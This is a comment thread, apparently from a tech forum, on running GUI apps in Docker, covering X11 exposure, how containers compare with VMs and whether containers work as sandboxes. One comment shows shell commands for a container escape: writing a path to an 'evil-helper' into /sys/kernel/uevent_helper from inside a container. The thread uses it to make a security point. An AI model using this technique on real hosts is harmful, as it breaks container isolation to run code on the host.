Running GUI apps with Docker
fabiorehm.com
fabiorehm.com
Might I assume that the approach in the article gives processes in the container full access to one's X11 session and contents?
[1]: SSH X11 forwarding
PS: I you like Fábio's work, consider tipping him[2] (I already did, with bitcoins! :)
On a side note, I've been doing this with chroot/debootstrap for years, but lxc/docker provide a nice "engineered" solution.
Seems like there's little to gain and a lot to configure/worry about with the Docker setup. Happy to be learned somethin' ... just would like to know what that somethin' is.
* You can run different versions of program side-by-side: FF 32 in one window, and FF 31 in another to test compatibility and regression.
* You can install programs without polluting your base system. I don't want to have Java installed, but sometimes I just need to run an applet.
All of that can be achieved with traditional VM, but with the performance penalty. As Docker runs on top of the native kernel, speed should be comparable to the application running directly on host.
In a traditional VM, you have to reserve memory that is used by the guest OS and the apps you want to run, and is unavailable as soon as the VM comes up.
Docker is incredibly lightweight in comparison. Also, you can move your development environment around, same way you would move a VM disk around. That requires less resources, again, as there is no OS install.
Linux containers (LXC, libvirt-lxc, Docker) are shared kernel visualization. Every single kernel vulnerability will hit you hard.
In contrast to LXC and libvirt-lxc Docker lets you configure a lot of insane setups which are not secure. (But easy to setup) Also keep in mind resource issues. If you setup your container in a wrong way it my eat all your available file descriptors, all memory, etc... (Because it is shared kernel)
Let's face it, the whole technology was not designed for sandboxing, more for easy deployment of applications.
That said, I really love container and use them a lot in production with libvirt-lxc. But I don't use them for sandboxing.
That said the example is not a good one because of the changes applied these days, e.g. the use of the UID on the host-side.
/sys is already mounted and it is read-only, and it cannot be mounted manually:
root@07ba8c752195:/# mkdir sys2
root@07ba8c752195:/# mount -t sysfs sysfs /sys2
mount: block device sysfs is write-protected, mounting read-only
mount: cannot mount block device sysfs read-only kalmi@sylph ~> docker run -t -i busybox:latest
/ # mount -t sysfs sysfs /sys
mount: permission denied (are you root?)
/ # mkdir sys2
/ # mount -t sysfs sysfs /sys2
mount: mounting sysfs on /sys2 failed: Permission denied
kalmi@sylph ~> docker --version
Docker version 1.2.0, build fa7b24f
kalmi@sylph ~> uname -r
Linux sylph 3.13.0-35-generic #62-Ubuntu SMP Fri Aug 15 01:58:42 UTC 2014 x86_64 x86_64 x86_64 GNU/LinuxThe /sys is mounted already and reading/writing to it succeeds:
/ # mount -t sysfs sysfs /sys
mount: permission denied (are you root?)
/ # echo /var/lib/docker/aufs/mnt/638ae26bb710384a8ebade3a66049277affea8b0f3e96003d351f167a9706aef/tmp/evil-helper > /sys/kernel/uevent_helper
/ # cat /sys/kernel/uevent_helper
/var/lib/docker/aufs/mnt/638ae26bb710384a8ebade3a66049277affea8b0f3e96003d351f167a906aef/tmp/evil-helper
From there the attack works. Obviously the change here is that I need to know the full UID, which is a cheat, but ..It uses X11 forwarding for the GUI, and PulseAudio for the sound.
http://linux.slashdot.org/story/07/08/26/1312256/skype-linux...
The thing that made me finally uninstall it (from everything) is when my phone OS (MIUI) informed me that Skype wanted to suddenly take a photo of me even though I hadn't touched the app for days.
I never tried Docker, but I wonder, if this requirements can be achieved with SeLinux or AppArmor as they are supported by many distributions and are around longer than Docker?
Would be great to be able to tighten the corset around any non open-source application, to make sure it is not siphoning data.
You'd need some form of "X11 firewall" to be secure.